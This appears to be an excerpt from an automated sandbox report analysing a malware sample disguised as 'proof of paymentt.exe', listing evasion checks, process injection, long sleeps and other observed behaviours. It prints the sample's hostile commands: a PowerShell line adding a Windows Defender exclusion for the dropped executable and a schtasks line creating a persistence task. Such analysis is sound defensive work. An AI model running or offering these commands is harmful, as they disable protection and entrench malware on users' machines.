Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: proof of paymentt.exe PID: 6500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mQpdTSxCjbPop.exe PID: 4304, type: MEMORYSTR

Delayed program exit found

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_0040F7A7 Sleep,ExitProcess,

12_2_0040F7A7

Source: C:\Users\user\Desktop\proof of paymentt.exe	Memory allocated: D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Memory allocated: 2C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Memory allocated: 2B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Memory allocated: 7C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Memory allocated: 8C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Memory allocated: 8E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Memory allocated: 9E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Memory allocated: 13E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Memory allocated: 2EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Memory allocated: 2D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Memory allocated: 7A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Memory allocated: 8A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Memory allocated: 8BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Memory allocated: 9BE0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\proof of paymentt.exe

Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

16_2_0040DD85

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

12_2_0041A748

Source: C:\Users\user\Desktop\proof of paymentt.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6326	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3486	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Window / User API: threadDelayed 4202	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Window / User API: threadDelayed 5543	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Window / User API: foregroundWindowGot 1751	Jump to behavior

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	API coverage: 6.3 %
Source: C:\Users\user\Desktop\proof of paymentt.exe	API coverage: 9.7 %

Source: C:\Users\user\Desktop\proof of paymentt.exe TID: 6528	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4208	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe TID: 5044	Thread sleep count: 77 > 30	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe TID: 5044	Thread sleep time: -38500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe TID: 5080	Thread sleep count: 4202 > 30	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe TID: 5080	Thread sleep time: -12606000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe TID: 5080	Thread sleep count: 5543 > 30	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe TID: 5080	Thread sleep time: -16629000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe TID: 6092	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_100010F1
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 7_2_10006580 FindFirstFileExA,	7_2_10006580
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	12_2_00409253
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	12_2_0041C291
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	12_2_0040C34D
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	12_2_00409665
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0044E879 FindFirstFileExA,	12_2_0044E879
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	12_2_0040880C
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0040783C FindFirstFileW,FindNextFileW,	12_2_0040783C
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	12_2_00419AF5
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	12_2_0040BB30
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	12_2_0040BD37
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,	16_2_0040AE51
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	17_2_00407EF8
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	19_2_00407898

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

12_2_00407C97

Source: C:\Users\user\Desktop\proof of paymentt.exe

Code function: 16_2_00418981 memset,GetSystemInfo,

16_2_00418981

Source: C:\Users\user\Desktop\proof of paymentt.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: mQpdTSxCjbPop.exe, 00000009.00000002.2071300300.000000000A420000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.
Source: proof of paymentt.exe, 00000007.00000002.4458837549.000000000133C000.00000004.00000020.00020000.00000000.sdmp, proof of paymentt.exe, 00000007.00000002.4458472507.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mQpdTSxCjbPop.exe, 00000009.00000002.2071300300.000000000A420000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: proof of paymentt.exe, 00000007.00000002.4458472507.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@

Source: C:\Users\user\Desktop\proof of paymentt.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\proof of paymentt.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\proof of paymentt.exe

Code function: 7_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_100060E2

Source: C:\Users\user\Desktop\proof of paymentt.exe

16_2_0040DD85

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

12_2_0041CB50

Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 7_2_10004AB4 mov eax, dword ptr fs:[00000030h]		7_2_10004AB4
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_004432B5 mov eax, dword ptr fs:[00000030h]		12_2_004432B5

Source: C:\Users\user\Desktop\proof of paymentt.exe

Code function: 7_2_1000724E GetProcessHeap,

7_2_1000724E

Source: C:\Users\user\Desktop\proof of paymentt.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 7_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_100060E2
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 7_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_10002639
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 7_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_10002B1C
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_004349F9
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00434B47 SetUnhandledExceptionFilter,	12_2_00434B47
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0043BB22
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00434FDC

Source: C:\Users\user\Desktop\proof of paymentt.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe"
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\proof of paymentt.exe	Memory written: C:\Users\user\Desktop\proof of paymentt.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Memory written: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: NULL target: C:\Users\user\Desktop\proof of paymentt.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: NULL target: C:\Users\user\Desktop\proof of paymentt.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: NULL target: C:\Users\user\Desktop\proof of paymentt.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

12_2_004120F7

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_00419627 mouse_event,

12_2_00419627

Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe"	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp73D0.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe"	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\vtvkcyiauscpqjziosjypht"	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\vtvkcyiauscpqjziosjypht"	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\foaddqtciauctxnmgdeaamokiq"	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\qqgoejdwwimhddbqpnrbdyitqektl"	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\qqgoejdwwimhddbqpnrbdyitqektl"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp7E5F.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process created: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe "C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe"	Jump to behavior

Source: proof of paymentt.exe, 00000007.00000002.4458987342.000000000134B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerYW\
Source: proof of paymentt.exe, 00000007.00000002.4458837549.000000000133C000.00000004.00000020.00020000.00000000.sdmp, proof of paymentt.exe, 00000007.00000002.4458987342.000000000134B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: proof of paymentt.exe, 00000007.00000002.4458837549.000000000133C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager%D
